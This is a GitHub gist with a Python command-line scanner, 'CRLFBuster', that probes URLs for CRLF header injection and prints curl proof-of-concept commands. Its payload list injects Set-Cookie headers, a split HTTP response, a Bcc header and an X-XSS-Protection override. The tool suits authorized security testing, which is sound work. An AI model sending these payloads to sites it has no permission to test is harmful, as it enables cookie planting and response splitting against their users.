Created
July 26, 2024 13:39
-
-
Save queencitycyber/b0c2fb2cf965c47e1f8907433b9d5df9 to your computer and use it in GitHub Desktop.
Identify and exploit potential CRLF injection vulnerabilities in web applications.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
```python
import asyncio
import json
import re
import shlex
from typing import List, Dict
from urllib.parse import unquote

import aiohttp
import click
from rich.console import Console
from rich.progress import Progress
from rich.table import Table
# Shared rich console used for all terminal output in this module.
console = Console()
# URL-encoded payloads sent in the `inject` query parameter. Each begins with
# an encoded CRLF (%0D%0A) followed by the header or response text the scanner
# tries to smuggle into the server's reply.
CRLF_PAYLOADS = [
    "%0D%0A",
    "%0D%0AContent-Length:%200%0D%0A%0D%0AHTTP/1.1%20200%20OK",
    "%0D%0ASet-Cookie:%20malicious=1",
    # NOTE(review): the address here was lost to e-mail obfuscation (the text
    # read "%[email protected]", which is not valid percent-encoding). A
    # placeholder on the reserved example.com domain is used instead; confirm
    # against the intended value.
    "%0D%0ABcc:%20attacker@example.com",
    "%0D%0AUser-Agent:%20Malicious%0D%0A",
    "%0D%0AX-XSS-Protection:%200",
]
class CRLFBuster:
    """Scan URLs for CRLF (HTTP header) injection and report the findings.

    Args:
        urls: Target URLs; each one is requested with the entries of
            ``CRLF_PAYLOADS`` in the ``inject`` query parameter.
        show_poc: When true, the table and the text report include a ``curl``
            proof-of-concept command for every finding.
    """

    def __init__(self, urls: List[str], show_poc: bool):
        self.urls = urls
        self.show_poc = show_poc

    @staticmethod
    def _injected_headers(payload: str) -> Dict[str, str]:
        """Return the ``{name: value}`` headers a URL-encoded payload injects.

        Lines that are not of the form ``name: value`` (the bare CRLF, a
        smuggled status line) are ignored, so a payload that carries no
        header yields an empty dict.
        """
        injected = {}
        for line in unquote(payload).split("\r\n"):
            name, colon, value = line.partition(":")
            name = name.strip()
            # Header names never contain whitespace; this rejects stray text
            # that merely happens to contain a colon.
            if colon and name and not any(ch.isspace() for ch in name):
                injected[name] = value.strip()
        return injected

    @staticmethod
    def _build_test_url(url: str, payload: str) -> str:
        """Return ``url`` with ``inject=<payload>`` added to its query string."""
        # A fragment is never sent to the server, and appending after it would
        # hide the payload inside the fragment, so it is dropped.
        base = url.partition("#")[0]
        separator = "&" if "?" in base else "?"
        return f"{base}{separator}inject={payload}"

    @staticmethod
    def _header_pairs(headers) -> set:
        """Return ``headers`` as a set of ``(lowercased name, value)`` pairs."""
        return {
            (str(name).lower(), str(value).strip())
            for name, value in headers.items()
        }

    @classmethod
    def _detect_injection(cls, payload: str, response_headers, baseline_headers) -> List[str]:
        """Return the payload's header names that the response newly contains.

        A header counts as injected only if it appears as a real response
        header (matching name, value starting with the injected value) and the
        same name/value pair was not already present in the baseline response.
        A payload merely reflected inside another header's value, or a header
        the server sends anyway, is therefore not reported.
        """
        new_pairs = cls._header_pairs(response_headers) - cls._header_pairs(baseline_headers)
        hits = []
        for name, value in cls._injected_headers(payload).items():
            wanted = name.lower()
            # startswith: the server may append the rest of the reflected
            # value (e.g. further query parameters) after the injected text.
            if any(seen == wanted and got.startswith(value) for seen, got in new_pairs):
                hits.append(name)
        return hits

    async def test_single_url(self, url: str, session: "aiohttp.ClientSession") -> Dict:
        """Probe one URL with each payload and return its result dict.

        The URL is first fetched unmodified to obtain baseline headers, then
        once per payload (redirects are not followed). Scanning stops at the
        first payload whose header shows up in the response.

        Returns:
            ``{"url", "vulnerable", "details", "poc"}``; request failures are
            recorded in ``details`` as ``"Error: ..."`` rather than raised.
        """
        result = {"url": url, "vulnerable": False, "details": [], "poc": []}
        try:
            async with session.get(url, allow_redirects=False) as baseline:
                baseline_headers = baseline.headers

            for payload in CRLF_PAYLOADS:
                # A payload without a header (bare CRLF) leaves nothing that
                # can be observed in the response headers.
                if not self._injected_headers(payload):
                    continue

                test_url = self._build_test_url(url, payload)
                async with session.get(test_url, allow_redirects=False) as response:
                    injected = self._detect_injection(
                        payload, response.headers, baseline_headers
                    )

                if injected:
                    result["vulnerable"] = True
                    result["details"].append(
                        f"CRLF injection succeeded with payload: {payload}"
                    )
                    # shlex.quote keeps the command safe to paste even when
                    # the target URL contains quotes or shell metacharacters.
                    result["poc"].append(f"curl -i {shlex.quote(test_url)}")
                    break
        except Exception as e:
            # Deliberately broad: one unreachable or malformed target must not
            # abort the scan of the remaining URLs.
            result["details"].append(f"Error: {e}")
        return result

    async def test_urls(self) -> List[Dict]:
        """Test all URLs concurrently over one session, with a progress bar.

        Returns:
            One result dict per URL, in the order the probes complete.
        """
        async with aiohttp.ClientSession() as session:
            pending = [self.test_single_url(url, session) for url in self.urls]
            results = []
            with Progress() as progress:
                task = progress.add_task("[cyan]Testing URLs...", total=len(self.urls))
                for finished in asyncio.as_completed(pending):
                    results.append(await finished)
                    progress.update(task, advance=1)
            return results

    def display_results(self, results: List[Dict]):
        """Print a table of the vulnerable URLs (plus PoC when enabled)."""
        table = Table(title="CRLF Injection Scan Results")
        table.add_column("URL", style="cyan")
        table.add_column("Vulnerable", style="magenta")
        table.add_column("Details", style="green")
        if self.show_poc:
            table.add_column("PoC", style="yellow")

        for result in results:
            # Only confirmed findings are listed.
            if not result["vulnerable"]:
                continue
            row = [result["url"], "Yes", "\n".join(result["details"])]
            if self.show_poc:
                row.append("\n".join(result["poc"]))
            table.add_row(*row)
        console.print(table)

    def save_results(self, results: List[Dict], output_format: str):
        """Write results to ``crlf_results.json`` or ``crlf_results.txt``.

        Args:
            results: Result dicts as returned by ``test_urls``.
            output_format: ``'json'`` dumps every result; ``'text'`` writes
                only the vulnerable ones. Any other value is reported as
                unsupported and nothing is written.
        """
        if output_format == 'json':
            path = 'crlf_results.json'
            with open(path, 'w', encoding='utf-8') as f:
                json.dump(results, f, indent=2)
        elif output_format == 'text':
            path = 'crlf_results.txt'
            with open(path, 'w', encoding='utf-8') as f:
                for result in results:
                    if not result["vulnerable"]:
                        continue
                    lines = [
                        f"URL: {result['url']}",
                        "Vulnerable: Yes",
                        f"Details: {', '.join(result['details'])}",
                    ]
                    if self.show_poc:
                        lines.append(f"PoC: {', '.join(result['poc'])}")
                    # Blank line separates consecutive records.
                    f.write("\n".join(lines) + "\n\n")
        else:
            console.print(f"[bold red]Unsupported output format: {output_format}[/bold red]")
            return
        # Report the file actually written (the text report ends in .txt).
        console.print(f"Results saved to {path}")
@click.command()
@click.option('--url', help='Single URL to test')
@click.option('--file', type=click.File('r'), help='File containing URLs to test')
@click.option('--poc', is_flag=True, help='Output PoC curl commands')
@click.option('--output', type=click.Choice(['json', 'text']), help='Output format for results')
def main(url, file, poc, output):
    """Scan a single URL or a file of URLs for CRLF injection."""
    if url:
        urls = [url]
    elif file:
        # One URL per line; blank lines are skipped.
        urls = [line.strip() for line in file if line.strip()]
    else:
        urls = []

    if not urls:
        console.print("[bold red]Please provide either a URL or a file containing URLs.[/bold red]")
        # Non-zero status so scripts can tell that nothing was scanned.
        raise SystemExit(1)

    buster = CRLFBuster(urls, poc)
    results = asyncio.run(buster.test_urls())
    buster.display_results(results)
    if output:
        buster.save_results(results, output)


if __name__ == "__main__":
    main()
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment